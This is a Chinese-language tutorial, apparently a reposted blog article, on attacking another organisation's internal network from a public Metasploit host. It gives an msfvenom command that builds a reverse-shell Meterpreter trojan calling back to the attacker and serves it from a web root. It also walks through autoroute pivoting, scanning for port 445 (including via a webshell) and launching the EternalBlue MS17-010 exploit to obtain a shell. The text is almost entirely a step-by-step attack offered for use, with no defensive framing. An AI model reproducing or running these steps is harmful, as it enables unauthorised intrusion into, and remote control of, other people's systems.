1. 程式人生 > >利用公網Msf+MS17010跨網段攻擊內網(不詳細立馬關站)

利用公網Msf+MS17010跨網段攻擊內網(不詳細立馬關站)

前言

其實很多小白在對利用msf進行ms17010攻擊的時候總是不成功,其實這都是因為網上大部分的文章都是寫的內網對內網(192.168.1.2-->192.168.1.3)這樣的案例,今天寫了一下利用公網的MSF直接攻擊其他伺服器內網的案例。

準備工作

1.安裝了Msf的公網主機+Ubuntu系統

2.一臺其他伺服器內網存在445漏洞

3.細心,細心,細心,鑽研,鑽研!!!

開始第一步:公網主機操作

生成msf木馬:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

Msf監聽埠:6666

可以看到,圖中獲取到了shell!

新增路由

第一步:run get_local_subnets (獲取當前路由)

第二步:run autoroute -s 192.168.3.0/24 (新增路由)

第三步:run autoroute -p (檢視已新增路由)

使用Payload進行攻擊

第一步:background(轉換到後臺)

第二步:use scanner/portscan/tcp (先掃描開放445埠的PC)

第三步:exploit(開始掃描)

注意:掃描出來開放了445埠的PC,不一定就存在445漏洞。(如何精準定位?)

如何列出那些存在445漏洞的PC?

描述:

工具的使用步驟如下:
解壓後在命令列下執行MS_17_010_Scan.exe,支援-ip 和-file兩種引數。
-ip引數可以指定IP掃描,同時支援IP段掃描:
MS_17_010_Scan.exe -ip 192.168.44.129
MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
-file引數支援從檔案讀取IP列表進行掃描:
MS_17_010_Scan.exe -file ip.txt
工具將顯示檢測結果:如不存在風險將顯示NOT Found Vuln,如存在風險將顯示Found Vuln MS17-010及目標電腦的作業系統版本,如果IP地址無效或者漏洞埠未開則顯示Exception。


輸出結果同時儲存在當前目錄的result.txt中。
 

上面的工具也可以在webshell中使用,只需要把結果輸出到 txt文件中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

攻擊正式開始

第一步:use exploit/windows/smb/ms17_010_eternalblue(切換到攻擊模組)

第二步:set rhost 192.168.3.38(設定存在445漏洞的PC電腦IP)

第三步:exploit(執行攻擊)

第四步:攻擊完成,並且自動返回一個shell控制檯(如下圖)